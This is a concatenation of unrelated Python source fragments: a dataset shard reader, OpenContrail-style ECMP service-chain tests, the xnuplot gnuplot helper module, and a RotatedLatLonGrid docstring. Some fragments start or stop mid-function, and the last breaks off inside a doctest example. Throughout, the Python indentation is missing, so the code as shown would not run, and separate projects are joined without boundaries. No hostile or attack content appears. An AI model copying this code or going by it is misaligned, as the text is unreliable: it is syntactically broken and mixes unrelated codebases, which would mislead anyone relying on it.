shard = self.index.sample_shards[idx]
offset = self.index.sample_shard_offsets[idx]
size = self.index.bytes_per_sample[idx]
basename = get_shard_basename(shard)
shard_filename = os.path.join(self.local, basename)
with open(shard_filename, 'rb', 0) as fp:
fp.seek(offset)
data = fp.read(size)
return self._unpack_sample(data)
def _make_new_growing_epoch(self) -> int:
"""Start a new growing epoch, in which we own the sample sequence because it grows.
Returns:
int: The epoch ID, an identifier which is given back to the caller.
"""
with self._lock:
epoch = self._next_epoch
self._next_epoch += 1
self._epoch_to_todo_ids[epoch] = list(self._downloaded_ids)
return epoch
def _next_id(self, epoch: int) -> Optional[int]:
"""Get next sample of the growing epoch given by epoch, or None if done.
If we are currently out of samples but not finished downloading the
shards, blocks until it has new samples.
Args:
epoch (int): The epoch, an identifier for this sequence of samples.
Returns:
int: ID of next sample.
"""
while True:
with self._lock:
todo_ids = self._epoch_to_todo_ids[epoch]
if todo_ids:
# Higher perf to pop last, but shuffle=False wants in-order traversal
if self.shuffle:
return todo_ids.pop(-1)
else:
return todo_ids.pop(0)
elif self._is_downloaded:
del self._epoch_to_todo_ids[epoch]
return None
else:
pass
sleep(0.25)
def _iter_ids(self) -> Iterator[int]:
"""Get an iterator over | |
: 2 },
{ 'service_mode' : 'in-network', 'max_inst' : 2 }]
self.verify_multi_inline_svc(si_list=si_list, create_svms=True,
**self.common_args)
# end test_three_stage_SC_with_ECMP
@preposttest_wrapper
def test_multi_inline_SVC_VN_with_external_RT(self):
"""
Description: Validate multi-Inline SVC with ECMP.
Bug: 1436642
The Right VN and the left VN have external RTs configured.
The traffic between left and right VMs should go through the Service Chain.
Test steps:
1.Creating vm's - vm1 and vm2 in networks vn1 and vn2. Configure RT on the 2 VNs.
2.Creating a multi-stage service chain with in-network SIs, between the VNs.
3.There should be no traffic loss.
Pass criteria: Ping between the VMs should be successful and TCP traffic should reach vm2
from vm1 and vice-versa.
Maintainer : <EMAIL>
"""
si_list = [{'service_mode': 'in-network', 'max_inst': 1},
{'service_mode': 'in-network', 'max_inst': 1}]
ret_dict = self.verify_multi_inline_svc(si_list=si_list, create_svms=True,
**self.common_args)
si_fixtures = ret_dict['si_fixtures']
left_vn_fixture = ret_dict['left_vn_fixture']
right_vn_fixture = ret_dict['right_vn_fixture']
left_vm_fixture = ret_dict['left_vm_fixture']
right_vm_fixture = ret_dict['right_vm_fixture']
left_vn_fq_name = left_vn_fixture.vn_fq_name
right_vn_fq_name = right_vn_fixture.vn_fq_name
self.logger.info('Adding User-defined RT to the end VNs')
right_vn_fixture.add_route_target(router_asn=random.randint(
1000, 2000), route_target_number=random.randint(9000000, 9500000))
left_vn_fixture.add_route_target(router_asn=random.randint(
2000, 3000), route_target_number=random.randint(8500000, 9000000))
result, msg = self.validate_svc_action(
left_vn_fq_name, si_fixtures[0], right_vm_fixture, src='left')
result, msg = self.validate_svc_action(
right_vn_fq_name, si_fixtures[-1], left_vm_fixture, src='right')
assert left_vm_fixture.ping_with_certainty(right_vm_fixture.vm_ip)
assert right_vm_fixture.ping_with_certainty(left_vm_fixture.vm_ip)
# end test_multi_inline_SVC_VN_with_external_RT
@preposttest_wrapper
def test_three_stage_SC_with_traffic(self):
"""
Description: Validate multi-Inline SVC with traffic.
Test steps:
1.Creating vm's - vm1 and vm2 in networks vn1 and vn2.
2.Creating 3 service instances.
3.Creating a service chain by applying the 3 service instances in a policy between t
he VNs.
4.There should be no traffic loss.
Pass criteria: Ping between the VMs should be successful and TCP traffic should reach vm2
from vm1 and vice-versa.
Maintainer : <EMAIL>
"""
si_list = [ { 'service_mode' : 'transparent', 'max_inst' : 2 },
{ 'service_mode' : 'in-network', 'max_inst' : 2 },
{ 'service_mode' : 'in-network-nat', 'max_inst' : 2 } ]
if self.inputs.get_af() == 'v6':
si_list = [ { 'service_mode' : 'transparent', 'max_inst' : 2 },
{ 'service_mode' : 'in-network', 'max_inst' : 2 }]
ret_dict = self.verify_multi_inline_svc(si_list=si_list, create_svms=True,
**self.common_args)
last_si_fixture = ret_dict['si_fixtures'][-1]
svm_ids = last_si_fixture.svm_ids
dst_vm_list = [self.right_vm_fixture]
self.verify_traffic_flow(
self.left_vm_fixture, dst_vm_list, last_si_fixture,
self.left_vn_fixture)
# end test_three_stage_SC_with_traffic
class TestECMPSanityIPv6(TestECMPSanity):
@classmethod
def setUpClass(cls):
cls.set_af('v6')
super(TestECMPSanityIPv6, cls).setUpClass()
def is_test_applicable(self):
if not self.connections.orch.is_feature_supported('ipv6'):
return(False, 'IPv6 tests not supported in this environment ')
return (True, None)
@preposttest_wrapper
def test_ecmp_svc_v2_transparent_with_3_instance(self):
super(TestECMPSanityIPv6,self).test_ecmp_svc_v2_transparent_with_3_instance()
@test.attr(type=['cb_sanity', 'sanity'])
@preposttest_wrapper
@skip_because(min_nodes=3)
def test_ecmp_svc_in_network_with_3_instance(self):
super(TestECMPSanityIPv6,self).test_ecmp_svc_in_network_with_3_instance()
@preposttest_wrapper
def test_ecmp_svc_in_network_with_static_route_no_policy(self):
super(TestECMPSanityIPv6,self).test_ecmp_svc_in_network_with_static_route_no_policy()
class TestECMPIPv6Fragments(BaseNeutronTest, TestECMPSanity, VerifyIntfMirror):
@classmethod
def setUpClass(cls):
#cls.set_af('v6')
cls.image_name='ubuntu-traffic'
super(TestECMPIPv6Fragments, cls).setUpClass()
def is_test_applicable(self):
if not self.connections.orch.is_feature_supported('ipv6'):
return(False, 'IPv6 tests not supported in this environment ')
return (True, None)
@preposttest_wrapper
@skip_because(min_nodes=3)
def test_ecmp_svc_in_network_with_fragments_packet_mode(self):
self.verify_svc_chain_with_fragments(max_inst=2,
service_mode='in-network',
create_svms=True,
packet_mode=True,
**self.common_args)
@preposttest_wrapper
@skip_because(min_nodes=3)
def test_ecmp_svc_in_network_with_fragments(self):
self.verify_svc_chain_with_fragments(max_inst=2,
service_mode='in-network',
create_svms=True,
**self.common_args)
@preposttest_wrapper
@skip_because(min_nodes=3)
def test_ecmp_svc_in_network_with_mirror_packet_mode(self):
self.verify_svc_chain_with_mirror(max_inst=2,
service_mode='in-network',
create_svms=True,
packet_mode=True,
**self.common_args)
@preposttest_wrapper
@skip_because(min_nodes=3)
def test_ecmp_svc_in_network_with_mirror(self):
self.verify_svc_chain_with_mirror(max_inst=2,
service_mode='in-network',
create_svms=True,
**self.common_args)
@preposttest_wrapper
@skip_because(min_nodes=3)
def test_ecmp_svc_in_network_with_mirror_aap_packet_mode(self):
self.verify_svc_chain_with_mirror_aap(max_inst=2,
service_mode='in-network',
create_svms=True,
**self.common_args)
@preposttest_wrapper
@skip_because(min_nodes=3)
def test_ecmp_svc_in_network_with_mirror_aap(self):
self.verify_svc_chain_with_mirror_aap(max_inst=2,
service_mode='in-network',
create_svms=True,
**self.common_args)
class TestECMPVro(TestECMPSanity):
@classmethod
def setUpClass(cls):
cls.vro_based = True
super(TestECMPVro, cls).setUpClass()
def is_test_applicable(self):
if self.inputs.orchestrator == 'vcenter' and not self.inputs.vro_based:
return(False, 'Skipping Test Vro server not present on vcenter setup')
return (True, None)
@test.attr(type=['vcenter','vro'])
@preposttest_wrapper
@skip_because(min_nodes=3)
def test_ecmp_svc_in_network_with_3_instance(self):
super(TestECMPVro,self).test_ecmp_svc_in_network_with_3_instance()
class TestECMPFeatureIPv6(TestECMPFeature):
@classmethod
def setUpClass(cls):
cls.set_af('v6')
super(TestECMPFeatureIPv6, cls).setUpClass()
def is_test_applicable(self):
if not self.connections.orch.is_feature_supported('ipv6'):
return(False, 'IPv6 tests not supported in this environment ')
return (True, None)
@preposttest_wrapper
def test_ecmp_svc_v2_in_network_nat_with_3_instance(self):
super(TestECMPFeatureIPv6,self).test_ecmp_svc_v2_in_network_nat_with_3_instance()
class TestECMPwithSVMChangeIPv6(TestECMPwithSVMChange):
@classmethod
def setUpClass(cls):
cls.set_af('v6')
super(TestECMPwithSVMChangeIPv6, cls).setUpClass()
def is_test_applicable(self):
if not self.connections.orch.is_feature_supported('ipv6'):
return(False, 'IPv6 tests not supported in this environment ')
return (True, None)
@preposttest_wrapper
def test_ecmp_with_svm_deletion(self):
super(TestECMPwithSVMChangeIPv6,self).test_ecmp_with_svm_deletion()
class TestMultiInlineSVCIPv6(TestMultiInlineSVC):
@classmethod
def setUpClass(cls):
cls.set_af('v6')
super(TestMultiInlineSVCIPv6, cls).setUpClass()
def is_test_applicable(self):
if not self.connections.orch.is_feature_supported('ipv6'):
return(False, 'IPv6 tests not supported in this environment ')
return (True, None)
@test.attr(type=['sanity'])
@preposttest_wrapper
def test_svc_fate_sharing_basic(self):
super(TestMultiInlineSVCIPv6,self).test_svc_fate_sharing_basic()
@preposttest_wrapper
def test_svc_fate_sharing_basic_with_transparent(self):
super(TestMultiInlineSVCIPv6,self).test_svc_fate_sharing_basic_with_transparent()
@preposttest_wrapper
def test_svc_fate_sharing_basic_with_transparent_in_net_nat(self):
super(TestMultiInlineSVCIPv6,self).test_svc_fate_sharing_basic_with_transparent_in_net_nat()
@preposttest_wrapper
@skip_because(min_nodes=2)
def test_svc_fate_sharing_in_2_multi_inline_svc_chains_in_net_in_net(self):
super(TestMultiInlineSVCIPv6,self).test_svc_fate_sharing_in_2_multi_inline_svc_chains_in_net_in_net()
@preposttest_wrapper
@skip_because(min_nodes=2)
def test_svc_fate_sharing_basic_with_multiple_svm_instances(self):
super(TestMultiInlineSVCIPv6,self).test_svc_fate_sharing_basic_with_multiple_svm_instances()
@preposttest_wrapper
@skip_because(min_nodes=2)
def test_svc_fate_sharing_basic_with_3_svm_instances(self):
super(TestMultiInlineSVCIPv6,self).test_svc_fate_sharing_basic_with_3_svm_instances()
@preposttest_wrapper
@skip_because(min_nodes=2)
def test_svc_fate_sharing_in_2_multi_inline_svc_chains_transparent_in_net_in_net_nat(self):
super(TestMultiInlineSVCIPv6,self).test_svc_fate_sharing_in_2_multi_inline_svc_chains_transparent_in_net_in_net_nat()
@preposttest_wrapper
@skip_because(min_nodes=2)
def test_svc_fate_sharing_in_2_multi_inline_svc_chains_transparent_in_net_transparent(self):
super(TestMultiInlineSVCIPv6,self).test_svc_fate_sharing_in_2_multi_inline_svc_chains_transparent_in_net_transparent()
@preposttest_wrapper
def test_three_stage_v2_SC(self):
super(TestMultiInlineSVCIPv6,self).test_three_stage_v2_SC()
class TestECMPConfigHashFeature(ECMPTestBase, VerifySvcFirewall, ECMPSolnSetup, ECMPTraffic, ECMPVerify):
@classmethod
def setUpClass(cls):
super(TestECMPConfigHashFeature, cls).setUpClass()
@classmethod
def tearDownClass(cls):
super(TestECMPConfigHashFeature, cls).tearDownClass()
# end tearDownClass
@test.attr(type=['sanity','vcenter'])
@preposttest_wrapper
@skip_because(min_nodes=3)
def test_ecmp_hash_src_ip(self):
"""
Validates ecmp hash when only source ip is configured
Maintainer : <EMAIL>
"""
# Bringing up the basic service chain setup.
max_inst = 2
service_mode = 'in-network-nat'
ecmp_hash = 'default'
config_level = "vn"
ret_dict = self.setup_ecmp_config_hash_svc(max_inst=max_inst,
service_mode=service_mode,
ecmp_hash=ecmp_hash,
config_level=config_level)
left_vn_fixture = ret_dict['left_vn_fixture']
right_vn_fixture = ret_dict['right_vn_fixture']
left_vm_fixture = ret_dict['left_vm_fixture']
right_vm_fixture = ret_dict['right_vm_fixture']
# ECMP Hash with only "source_ip"
ecmp_hash = {"source_ip": True}
config_level = "vn"
self.modify_ecmp_config_hash(ecmp_hash=ecmp_hash,
config_level=config_level,
right_vm_fixture=right_vm_fixture,
right_vn_fixture=right_vn_fixture)
# Verify ECMP Hash at Agent and control node
self.verify_ecmp_hash(ecmp_hash=ecmp_hash, vn_fixture=left_vn_fixture,
left_vm_fixture=left_vm_fixture,
right_vm_fixture=right_vm_fixture)
# Verify traffic from vn1 (left) to vn2 (right), with user specified
# flow count
flow_count = 5
si_fixture = ret_dict['si_fixture']
dst_vm_list = [right_vm_fixture]
self.verify_traffic_flow(left_vm_fixture, dst_vm_list,
si_fixture, left_vn_fixture,
ecmp_hash=ecmp_hash, flow_count=flow_count)
return True
# end test_ecmp_hash_src_ip
@preposttest_wrapper
def test_ecmp_hash_dest_ip(self):
"""
Validates ecmp hash when only destination ip is configured
Maintainer : <EMAIL>
"""
# Bringing up the basic service chain setup.
max_inst = 2
service_mode = 'in-network-nat'
ecmp_hash = 'default'
config_level = "vn"
ret_dict = self.setup_ecmp_config_hash_svc(max_inst=max_inst,
service_mode=service_mode,
ecmp_hash=ecmp_hash,
config_level=config_level)
left_vn_fixture = ret_dict['left_vn_fixture']
right_vn_fixture = ret_dict['right_vn_fixture']
left_vm_fixture = ret_dict['left_vm_fixture']
right_vm_fixture = ret_dict['right_vm_fixture']
# ECMP Hash with only "destination_ip"
ecmp_hash = {"destination_ip": True}
config_level = "vn"
self.modify_ecmp_config_hash(ecmp_hash=ecmp_hash,
config_level=config_level,
right_vm_fixture=right_vm_fixture,
right_vn_fixture=right_vn_fixture)
# Verify ECMP Hash at Agent and control node
self.verify_ecmp_hash(ecmp_hash=ecmp_hash, vn_fixture=left_vn_fixture,
left_vm_fixture=left_vm_fixture,
right_vm_fixture=right_vm_fixture)
# Verify traffic from vn1 (left) to vn2 (right), with user specified
# flow count
flow_count = 5
si_fixture = ret_dict['si_fixture']
dst_vm_list = [right_vm_fixture]
self.verify_traffic_flow(left_vm_fixture, dst_vm_list,
si_fixture, left_vn_fixture,
ecmp_hash=ecmp_hash, flow_count=flow_count)
return True
# end test_ecmp_hash_dest_ip
@preposttest_wrapper
def test_ecmp_hash_src_port(self):
"""
Validates ecmp hash when only source port is configured
Maintainer : <EMAIL>
"""
# Bringing up the basic service chain setup.
max_inst = 2
service_mode = 'in-network-nat'
ecmp_hash = 'default'
config_level = "vn"
# Distribute End VMs and service VMs across compute nodes
vm_launch_mode = "distribute"
ret_dict = self.setup_ecmp_config_hash_svc(max_inst=max_inst,
service_mode=service_mode,
ecmp_hash=ecmp_hash,
config_level=config_level)
left_vn_fixture = ret_dict['left_vn_fixture']
right_vn_fixture = ret_dict['right_vn_fixture']
left_vm_fixture = ret_dict['left_vm_fixture']
right_vm_fixture = ret_dict['right_vm_fixture']
# ECMP Hash with only "source_port"
ecmp_hash = {"source_port": True}
config_level = "vn"
self.modify_ecmp_config_hash(ecmp_hash=ecmp_hash,
config_level=config_level,
right_vm_fixture=right_vm_fixture,
right_vn_fixture=right_vn_fixture)
# Verify ECMP Hash at Agent and control node
self.verify_ecmp_hash(ecmp_hash=ecmp_hash, vn_fixture=left_vn_fixture,
left_vm_fixture=left_vm_fixture,
right_vm_fixture=right_vm_fixture)
# Verify traffic from vn1 (left) to vn2 (right), with user specified
# flow count
flow_count = 5
dst_vm_list = [right_vm_fixture]
si_fixture = ret_dict['si_fixture']
self.verify_traffic_flow(left_vm_fixture, dst_vm_list,
si_fixture, left_vn_fixture,
ecmp_hash=ecmp_hash, flow_count=flow_count)
return True
# end test_ecmp_hash_src_port
@preposttest_wrapper
def test_ecmp_hash_dest_port(self):
"""
Validates ecmp hash when only destination port is configured
Maintainer : <EMAIL>
"""
# Bringing up the basic service chain setup.
max_inst = 2
service_mode = 'in-network-nat'
ecmp_hash = 'default'
config_level = "vn"
ret_dict = self.setup_ecmp_config_hash_svc(max_inst=max_inst,
service_mode=service_mode,
ecmp_hash=ecmp_hash,
config_level=config_level)
left_vn_fixture = ret_dict['left_vn_fixture']
right_vn_fixture = ret_dict['right_vn_fixture']
left_vm_fixture = ret_dict['left_vm_fixture']
right_vm_fixture = ret_dict['right_vm_fixture']
# ECMP Hash with only "destionation_port"
ecmp_hash = {"destination_port": True}
config_level = "vn"
self.modify_ecmp_config_hash(ecmp_hash=ecmp_hash,
config_level=config_level,
right_vm_fixture=right_vm_fixture,
right_vn_fixture=right_vn_fixture)
# Verify ECMP Hash at Agent and control node
self.verify_ecmp_hash(ecmp_hash=ecmp_hash, vn_fixture=left_vn_fixture,
left_vm_fixture=left_vm_fixture,
right_vm_fixture=right_vm_fixture)
# Verify traffic from vn1 (left) to vn2 (right), with user specified
# flow count
flow_count = 5
dst_vm_list = [right_vm_fixture]
si_fixture = ret_dict['si_fixture']
self.verify_traffic_flow(left_vm_fixture, dst_vm_list,
si_fixture, left_vn_fixture,
ecmp_hash=ecmp_hash, flow_count=flow_count)
# end test_ecmp_hash_dest_port
@preposttest_wrapper
def test_ecmp_hash_protocol(self):
"""
Validates ecmp hash when only ip protocol is configured
Maintainer : <EMAIL>
"""
# Bringing up the basic service chain setup.
max_inst = 2
service_mode = 'in-network-nat'
ecmp_hash = 'default'
config_level = "vn"
ret_dict = self.setup_ecmp_config_hash_svc(max_inst=max_inst,
service_mode=service_mode,
ecmp_hash=ecmp_hash,
config_level=config_level)
left_vn_fixture = ret_dict['left_vn_fixture']
right_vn_fixture = ret_dict['right_vn_fixture']
left_vm_fixture = ret_dict['left_vm_fixture']
right_vm_fixture = ret_dict['right_vm_fixture']
# ECMP Hash with only "ip_protocol"
ecmp_hash = {"ip_protocol": True}
config_level = "vn"
self.modify_ecmp_config_hash(ecmp_hash=ecmp_hash,
config_level=config_level,
right_vm_fixture=right_vm_fixture,
right_vn_fixture=right_vn_fixture)
# Verify ECMP Hash at Agent and control node
self.verify_ecmp_hash(ecmp_hash=ecmp_hash, vn_fixture=left_vn_fixture,
left_vm_fixture=left_vm_fixture,
right_vm_fixture=right_vm_fixture)
# Verify traffic from vn1 (left) to vn2 (right), with user specified
# flow count
flow_count = 5
si_fixture = ret_dict['si_fixture']
dst_vm_list = [right_vm_fixture]
self.verify_traffic_flow(left_vm_fixture, dst_vm_list,
si_fixture, left_vn_fixture,
ecmp_hash=ecmp_hash, flow_count=flow_count)
return True
# end test_ecmp_hash_protocol
@preposttest_wrapper
def test_ecmp_hash_deletion(self):
"""
Validates deletion of ecmp hash configuration. When explicit ecmp hash
is deleted, hashing should happen based upon default hash (5 tuple)
Maintainer : <EMAIL>
"""
# Bringing up the basic service chain setup.
max_inst = | |
<reponame>marktsuchida/Xnuplot<gh_stars>1-10
# Copyright (c) 2011 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import re
import sys
import contextlib
@contextlib.contextmanager
def no_autorefresh(plot):
"""A `with' statement context manager to switch off autorefresh."""
if hasattr(plot, "autorefresh"):
saveautorefresh = plot.autorefresh
plot.autorefresh = False
else:
saveautorefresh = None
yield plot
if saveautorefresh is not None:
plot.autorefresh = saveautorefresh
_getvar_pattern = re.compile("GETVAR_LEFT (.*) GETVAR_RIGHT")
def get_var(plot, varname, type_=str):
"""Get the value of a Gnuplot variable from plot."""
with no_autorefresh(plot) as plot2:
result = plot2("print \"GETVAR_LEFT \", %s, \" GETVAR_RIGHT\"" %
varname)
match = _getvar_pattern.search(result)
if not match:
return None
value = match.group(1)
if value is not None:
return type_(value)
def convert_coord(plot, axis, to_system, coord):
"""Convert coord from one system to the other.
The axis ranges are taken from the last plot, not necessarily the current
settings.
convert_coord(plot, "x", 2, x1) -> x2
"""
to_system = int(to_system)
from_system = 2 - to_system
from_name = axis.upper() + ("2" if from_system == 2 else "")
to_name = axis.upper() + ("2" if to_system == 2 else "")
from_min = get_var(plot, "GPVAL_%s_MIN" % from_name, float)
from_max = get_var(plot, "GPVAL_%s_MAX" % from_name, float)
to_min = get_var(plot, "GPVAL_%s_MIN" % to_name, float)
to_max = get_var(plot, "GPVAL_%s_MAX" % to_name, float)
if None not in (from_min, from_max, to_min, to_max):
return to_min + (to_max - to_min) * \
(coord - from_min) / (from_max - from_min)
else:
return None
def _convert_given_coord(plot, axis, to_sys, c1=None, c2=None):
# Subroutine for convert_coords() below.
if to_sys is not None:
given = (c1 is not None, c2 is not None)
if given == (True, False):
from_sys = 1
c = c1
elif given == (False, True):
from_sys = 2
c = c2
else:
raise ValueError("exactly one of %s1, %s2 must be given" %
(axis, axis))
if int(to_sys) == from_sys:
return c
else:
return convert_coord(plot, axis, to_sys, c)
_axes_pattern = re.compile("^(x([12]))?(y([12]))?$")
def convert_coords(plot, to_axes, x1=None, y1=None, x2=None, y2=None):
"""Convert coordinates between the first and second systems.
The axis ranges are taken from the last plot, not necessarily the current
settings.
convert_coords(plot, "y2", y1=y1) -> y2
convert_coords(plot, "x1y2", x1=x1, y1=y1) -> (x1, y2)
"""
to_x_sys, to_y_sys = _axes_pattern.match(to_axes).group(2, 4)
to_x = _convert_given_coord(plot, "x", to_x_sys, c1=x1, c2=x2)
to_y = _convert_given_coord(plot, "y", to_y_sys, c1=y1, c2=y2)
ret = filter(None, (to_x, to_y))
if len(ret) == 2:
return ret
elif len(ret) == 1:
return ret[0]
def get_range_settings(plot, axis, system=1):
with no_autorefresh(plot) as plot2:
return _get_range_settings(plot, axis, system)
def _get_range_settings(plot, axis, system):
range_name = axis + ("range" if int(system) == 1 else "2range")
range_str = plot("show " + range_name)
pattern = ("set +" + range_name +
r" +\[ *([^ :]+) *: *([^ :]+) *\] +(no)?reverse")
match = re.search(pattern, range_str)
if not match:
return None
range_min, range_max = match.group(1), match.group(2)
range_min = (float(range_min) if range_min != "*" else None)
range_max = (float(range_max) if range_max != "*" else None)
setting = (range_min, range_max)
reversed = match.group(3) != "no"
if None not in setting:
# The GPVAL_ vars don't reflect Button-3 zoomed ranges, so use the
# non-auto ranges if set.
current = (setting if not reversed else (setting[1], setting[0]))
else:
name = axis.upper() + ("2" if int(system) == 2 else "")
current_min = get_var(plot, "GPVAL_%s_MIN" % name, float)
current_max = get_var(plot, "GPVAL_%s_MAX" % name, float)
current = (current_min, current_max)
return dict(setting=setting, reversed=reversed, current=current)
def set_range(plot, axis, system, range, reverse=False, writeback=None):
range_name = axis + ("range" if int(system) == 1 else "2range")
range_min = ("%e" % range[0] if range[0] is not None else "*")
range_max = ("%e" % range[1] if range[1] is not None else "*")
reverse = (("reverse" if reverse else "noreverse")
if reverse is not None else None)
writeback = (("writeback" if writeback else "nowriteback")
if writeback is not None else None)
plot(" ".join(filter(None, ["set", range_name,
"[%s:%s]" % (range_min, range_max),
reverse, writeback])))
# TODO Events should probably be instances of their own class, rather than
# just a dict.
def get_last_event(plot):
with no_autorefresh(plot) as plot2:
return _get_last_event(plot2)
def _get_last_event(plot):
event = dict(button=get_var(plot, "MOUSE_BUTTON", int),
x1=get_var(plot, "MOUSE_X", float),
y1=get_var(plot, "MOUSE_Y", float),
x2=get_var(plot, "MOUSE_X2", float),
y2=get_var(plot, "MOUSE_Y2", float),
shift=bool(get_var(plot, "MOUSE_SHIFT", int)),
ctrl=bool(get_var(plot, "MOUSE_CTRL", int)),
alt=bool(get_var(plot, "MOUSE_ALT", int)),
char=get_var(plot, "MOUSE_CHAR"),
ascii=get_var(plot, "MOUSE_KEY", int))
if event["button"] is None or event["button"] == -1:
if event["ascii"] == -1:
event["event_type"] = "abnormal"
else:
event["event_type"] = "key"
else:
event["event_type"] = "click"
return event
def wait_for_event(plot, callback=None):
with no_autorefresh(plot) as plot2:
return _wait_for_event(plot2, callback)
def _wait_for_event(plot, callback):
should_continue = True
while should_continue:
plot.pause("mouse", "any")
event = get_last_event(plot)
should_continue = False
if callback is not None:
should_continue = callback(event)
if event["event_type"] == "abnormal":
should_continue = False
return event
_full_axes_pattern = re.compile("^x[12]y[12]$")
def _coord_keys(axes):
# Return e.g. ("x1", "y2") given "x1y2".
if not _full_axes_pattern.match(axes):
raise ValueError("invalid axes specifier: " + axes)
x_coord, y_coord = axes[:2], axes[2:]
return (x_coord, y_coord)
def get_line_segment(plot, axes="x1y1"):
with no_autorefresh(plot) as plot2:
return _get_line_segment(plot2, axes)
def _get_line_segment(plot, axes):
x_coord, y_coord = _coord_keys(axes)
points = []
def action(event):
if event["event_type"] == "click" and event["button"] == 1:
if len(points) == 0:
points.append((event[x_coord], event[y_coord]))
plot("set mouse ruler at %f,%f polardistance" %
(event["x1"], event["y1"]))
return True
elif len(points) == 1:
points.append((event[x_coord], event[y_coord]))
return False
elif event["event_type"] == "key" and event["ascii"] == 27: # Esc.
if len(points) == 0:
# Cancel line segment.
return False
elif len(points) == 1:
# Cancel first click.
points.pop()
plot("set mouse noruler")
return True
return True
wait_for_event(plot, action)
plot("set mouse noruler nopolardistance")
if len(points) < 2:
return None
return tuple(points)
def get_polyline(plot, axes="x1y1", vertex_callback=None):
with no_autorefresh(plot) as plot2:
return _get_polyline(plot2, axes, vertex_callback)
def _get_polyline(plot, axes, vertex_callback):
x_coord, y_coord = _coord_keys(axes)
points = []
def action(event):
if event["event_type"] == "click":
points.append((event[x_coord], event[y_coord]))
plot("set mouse ruler at %f,%f polardistance" %
(event["x1"], event["y1"]))
if vertex_callback is not None:
vertex_callback(points)
if event["button"] == 3:
return False
return True
elif event["event_type"] == "key":
if event["ascii"] == 27: # Esc.
if len(points):
# Cancel last point.
points.pop()
if vertex_callback is not None:
vertex_callback(points)
if len(points):
coord = convert_coords(plot, "x1y1",
**{x_coord: points[-1][0],
y_coord: points[-1][1]})
plot("set mouse ruler at %f,%f" % coord)
else:
plot("set mouse noruler")
return True
else:
# Cancel polyline.
points[:] = [None] # Marker for cancellation.
return False
elif event["ascii"] == 13: # Return.
return False
return True
event = wait_for_event(plot, action)
plot("set mouse noruler nopolardistance")
if len(points) and points[0] is None: # Cancelled.
return None
if event["event_type"] == "abnormal":
return None
return points
def input_polyline(plot, axes="x1y1", with_="lines", leave_polyline=True,
close_polygon=False):
if not isinstance(plot, list) or not hasattr(plot, "refresh"):
raise ValueError("plot must be an xnuplot.Plot instance")
with no_autorefresh(plot) as plot2:
return _input_polyline(plot2, axes, with_, leave_polyline,
close_polygon)
def _input_polyline(plot, axes, with_, leave_polyline, close_polygon):
x_coord, y_coord = _coord_keys(axes)
# We need to freeze the plot range so that it doesn't change.
xrange = get_range_settings(plot, "x", system=x_coord[1])
yrange = get_range_settings(plot, "y", system=y_coord[1])
set_range(plot, "x", x_coord[1], xrange["current"])
set_range(plot, "y", y_coord[1], yrange["current"])
with_spec = ("with " + with_ if with_ else None)
showing_polyline = [False]
plot_options = " ".join(filter(None, ["axes %s%s" % (x_coord, y_coord),
"notitle",
with_spec]))
def polyline_for_vertices(vertices):
vertex_data = "\n".join("%e %e" % (x, y) for x, y in vertices)
new_polyline = ((vertex_data, plot_options) if vertex_data else None)
return new_polyline
def vertices_changed(vertices):
changed = False
if showing_polyline[0]:
plot.pop()
showing_polyline[0] = False
changed = | |
grid_longitude
coordinates in degrees for the desired grid. Must be
positive.
*Parameter example:* ::
grid_longitude_resolution=10
grid_latitude_grid_longitude_location: `str` or `int`, optional
The location of the grid_latitude and grid_longitude
coordinates in relation to their grid cells (i.e. their
bounds). This information is required to generate the
grid_latitude and grid_longitude bounds for each grid
coordinate. If not provided, set to default 'centre'.
The locations left and right are related to the
grid_longitude coordinates (X-axis), while the locations
lower and upper are related to the grid_latitude
coordinates (Y-axis). The orientation of the coordinate
system considered is detailed below.
.. seealso::
*latitude_longitude_location* in
`LatLonGrid.from_extent_and_resolution`
grid_north_pole_latitude: `int` or `float`
The true latitude (i.e. in `EPSG:4326`_) of the north
pole of the rotated grid in degrees North. This parameter
is required to project the rotated grid into a true
latitude-longitude coordinate system.
grid_north_pole_longitude: `int` or `float`
The true longitude (i.e. in `EPSG:4326`_) of the north
pole of the rotated grid in degrees East. This parameter
is required to project the rotated grid into a true
latitude-longitude coordinate system.
north_pole_grid_longitude: `int` or `float`, optional
The longitude of the true north pole in the rotated grid
in degrees. This parameter is optional to project the
rotated grid into a true latitude-longitude coordinate
system (i.e. `EPSG:4326`_). If not provided, set to
default value 0.
.. altitude_extent: pair of `float` or `int`, optional
The extent of altitude coordinate in metres for the
desired grid. The first element of the pair is the
location of the start of the extent along the altitude
coordinate, the second element of the pair is the
location of the end of the extent along the altitude
coordinate. May be any type that can be unpacked (e.g.
`tuple`, `list`, `numpy.ndarray`).
*Parameter example:* ::
altitude_extent=(0, 20)
.. altitude_resolution: `float` or `int`, optional
The spacing between two consecutive altitude coordinates
in metres for the desired grid.
*Parameter example:* ::
altitude_resolution=20
.. altitude_location: `str` or `int`, optional
The location of the altitude coordinates in relation to
their grid cells (i.e. their bounds). This information
is required to generate the altitude bounds for each
grid coordinate. If not provided, set to default
'centre'.
The locations top and bottom are related to the
altitude coordinate (Z-axis). The orientation of the
coordinate system considered is such that the positive
direction is upwards.
.. seealso::
*altitude_location* in `LatLonGrid.from_extent_and_resolution`
*Parameter example:* ::
altitude_location='centre'
.. _`EPSG:4326`: https://epsg.io/4326
:Returns: `RotatedLatLonGrid`
**Examples**
>>> sd = RotatedLatLonGrid.from_extent_and_resolution(
... grid_latitude_extent=(-1.1, 1.1),
... grid_longitude_extent=(-2.72, -0.96),
... grid_latitude_resolution=0.44,
... grid_longitude_resolution=0.44,
... grid_north_pole_latitude=38.0,
... grid_north_pole_longitude=190.0
... )
>>> print(sd)
RotatedLatLonGrid(
